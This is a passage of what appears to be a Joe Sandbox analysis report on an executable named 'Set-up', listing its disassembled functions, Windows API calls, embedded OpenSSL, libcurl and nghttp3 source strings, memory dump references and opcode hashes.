                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assertmemcpymemmove
                                • String ID: ksl->head$nghttp3_ksl.c
                                • API String ID: 374949274-2784241221
                                • Opcode ID: c9b1a95330e29618407a7e7470bfa1f26d6e7ff0e7a9c6ede211fac261919889
                                • Instruction ID: bdc8599e780f20e163087341742f0142d9161d8a296d878062821dc17855877c
                                • Opcode Fuzzy Hash: c9b1a95330e29618407a7e7470bfa1f26d6e7ff0e7a9c6ede211fac261919889
                                • Instruction Fuzzy Hash: F21193702002059FDB049F09D88199AFBA6FFC5314F58C66EE9094B642D335EC44CBA2
                                Function 001488C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0014893B
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00148960
                                  • Part of subcall function 00137620: GetModuleHandleA.KERNEL32(ntdll), ref: 0013763F
                                  • Part of subcall function 00137620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 0013764B
                                  • Part of subcall function 00137620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00137695
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 001376D3
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 001376DA
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 001376E4
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 001376EB
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 001376FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
                                • String ID: @$ @
                                • API String ID: 2103437208-1089145642
                                • Opcode ID: 4adbd8b38699f0e619745c20533256a9e28d17874b622fcd51b686cfe2b362ce
                                • Instruction ID: 695bff31779df5e6c7e414f23015dfb93ad728edc1aea6f74c459261f4c7a4c3
                                • Opcode Fuzzy Hash: 4adbd8b38699f0e619745c20533256a9e28d17874b622fcd51b686cfe2b362ce
                                • Instruction Fuzzy Hash: 050180B15087429BF7109F14ED4A7BE77E4BF81708F01452CEA846A2E1E7B58988C782
                                Function 00238970 Relevance: 6.7, APIs: 5, Instructions: 425COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00238A9A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00238AEA
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00238BD7
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00238C2B
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00238E63
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 3a6de16d7b1b34158d5e2fb7dcd18fa41187bef40189692985b0b84542096435
                                • Instruction ID: 2645e83d04c6c575a7313cf8c4b95e2c0318b2546fb96d842e8e4e149f26c2c1
                                • Opcode Fuzzy Hash: 3a6de16d7b1b34158d5e2fb7dcd18fa41187bef40189692985b0b84542096435
                                • Instruction Fuzzy Hash: 0DF195F2A107128FDB18CF18C59075ABBA6FF84314F18C56DE9498B399DB74E865CB80
                                Function 0013C5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0013C685
                                  • Part of subcall function 001173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0011CA95,006E9AB8,00000467,mprintf.c), ref: 0011741D
                                  • Part of subcall function 001173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00117445
                                  • Part of subcall function 001173F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0011CA95,006E9AB8,00000467,mprintf.c), ref: 00117486
                                  • Part of subcall function 001173F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001174AA
                                  • Part of subcall function 001173F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001174B2
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0013C6CF
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0013C719
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                                • String ID: vtls/vtls.c
                                • API String ID: 1294796744-169717415
                                • Opcode ID: 98ff3c13854f66eb8752d69febc138158881d1c399fd1343e04ae6dfacf8fc85
                                • Instruction ID: ab09f8d70628128a0da0ef098b4d788927d2964e1f9a17fdeb7437b510e73f36
                                • Opcode Fuzzy Hash: 98ff3c13854f66eb8752d69febc138158881d1c399fd1343e04ae6dfacf8fc85
                                • Instruction Fuzzy Hash: 74A160B0B017039BD7208F6AD845B12B7E8BF64744F094539E958EB782FB71E950CB90
                                Function 0029E720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0029E9A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: $BN_lshift$crypto/bn/bn_shift.c
                                • API String ID: 2221118986-2228461501
                                • Opcode ID: 080ebe42fddff454f790b5504d7780b8e5320f8587f8c772cfa2e6efa3d80f19
                                • Instruction ID: 5aa7a5dd4910dd87a9b7ee7e01c4a34897038a35f8b63c34a6979305e57b1690
                                • Opcode Fuzzy Hash: 080ebe42fddff454f790b5504d7780b8e5320f8587f8c772cfa2e6efa3d80f19
                                • Instruction Fuzzy Hash: 1D710071A187118BDB14DF29C88062AF7A5AFDA310F098B2EFDA967391D770AC11CB41
                                Function 00314870 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 179stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,002C05BF,00000000,00000000,input), ref: 00314986
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 003149D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpystrlen
                                • String ID: crypto/property/property_string.c$ossl_property_string
                                • API String ID: 3412268980-3682758481
                                • Opcode ID: c7c8cd73263460bfe58bccc08d470332d972f947cd773b903f7dbfba8b1c6479
                                • Instruction ID: c538abf817789cbc68704ddeab6b5ad3fe3e64dd73fcc7c274a0894c3bfe4a7f
                                • Opcode Fuzzy Hash: c7c8cd73263460bfe58bccc08d470332d972f947cd773b903f7dbfba8b1c6479
                                • Instruction Fuzzy Hash: 415108B6E942056BD712BB64EC03F6B76985F14748F090038FD48A2253FB65EA70CB92
                                Function 00306590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0030662C
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memcmp
                                • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                                • API String ID: 1653033214-3047229099
                                • Opcode ID: 0bc38fd293d5101b5ae6121e5bb41e501beafafc381f243bd3c3f897c754e017
                                • Instruction ID: 663b6252eff4912861072906c5348ee4319b29c086946796c35d17dfe926394b
                                • Opcode Fuzzy Hash: 0bc38fd293d5101b5ae6121e5bb41e501beafafc381f243bd3c3f897c754e017
                                • Instruction Fuzzy Hash: 8B4167E5B453003BEA2236702C97F6B310C4F50758F140638FE099D2C7FAA6DA348AA7
                                Function 001D8710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 001D8769
                                • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 001D87D1
                                  • Part of subcall function 001D88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 001D88C1
                                  • Part of subcall function 001D88B0: QueryPerformanceCounter.KERNEL32(?), ref: 001D88CC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                                • String ID:
                                • API String ID: 3112449238-0
                                • Opcode ID: 6de7a39156943b0c48857361634e7b23079e38c2e4eaf884b08febc66da285e0
                                • Instruction ID: d889e57276539f3a7e512fa59b390b395e7ffffacdc0638e56eb89f9cc107acb
                                • Opcode Fuzzy Hash: 6de7a39156943b0c48857361634e7b23079e38c2e4eaf884b08febc66da285e0
                                • Instruction Fuzzy Hash: 0C31F8B2B00201ABEB089A31DC85B6BB6A8BB90340F54453DEC16D7291DF31FD14D7A1
                                Function 002C60E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(002C7CCC,?,00000000,002C7127,002C7CCC,00000000,002ECAB7,00111A70), ref: 002C60E3
                                • SetLastError.KERNEL32(00000000), ref: 002C61A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID: crypto/err/err.c$crypto/err/err_local.h
                                • API String ID: 1452528299-2963546075
                                • Opcode ID: c408cb7f1a97827ccbe60df78e020c7034ae734270c146243c8d45301c0b67a9
                                • Instruction ID: b63893b857e41d0c397527f92ce2008d3ac0657c95eeac02ab316f5d53baea03
                                • Opcode Fuzzy Hash: c408cb7f1a97827ccbe60df78e020c7034ae734270c146243c8d45301c0b67a9
                                • Instruction Fuzzy Hash: CB31F4B1AA430336E6211F68BC0BFA57700BB8475DF540328FE14652D3E7A56834CE92
                                Function 002A09A0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,0033066D,?,?,?), ref: 002A0AAD
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memset
                                • String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
                                • API String ID: 2970985887-4138242688
                                • Opcode ID: 2012fab889d0d96b7e281a4c766161d324744de34888560a556a17484deee94b
                                • Instruction ID: 3121de4357a23965b317ce72b7876187c44dbe9da42b04083f578b8893799280
                                • Opcode Fuzzy Hash: 2012fab889d0d96b7e281a4c766161d324744de34888560a556a17484deee94b
                                • Instruction Fuzzy Hash: BF31FF71B74301ABDB109E24DDC6F2A7B989F42714F088529F94D9F2C7EAA4DC248671
                                Function 00284460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,002871DD,00000000,?,?), ref: 002844AC
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 002844FF
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$strcpy$memcpy
                                • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                                • API String ID: 1223016426-1431402185
                                • Opcode ID: eb9212d0c83990cddd6f8eaeb89ad63303e954e6fd16c7bcca5353419998a0d9
                                • Instruction ID: d50dd9b97093fd148e5e588893c260f09101abe78345a6e3cbc1dddb553899d5
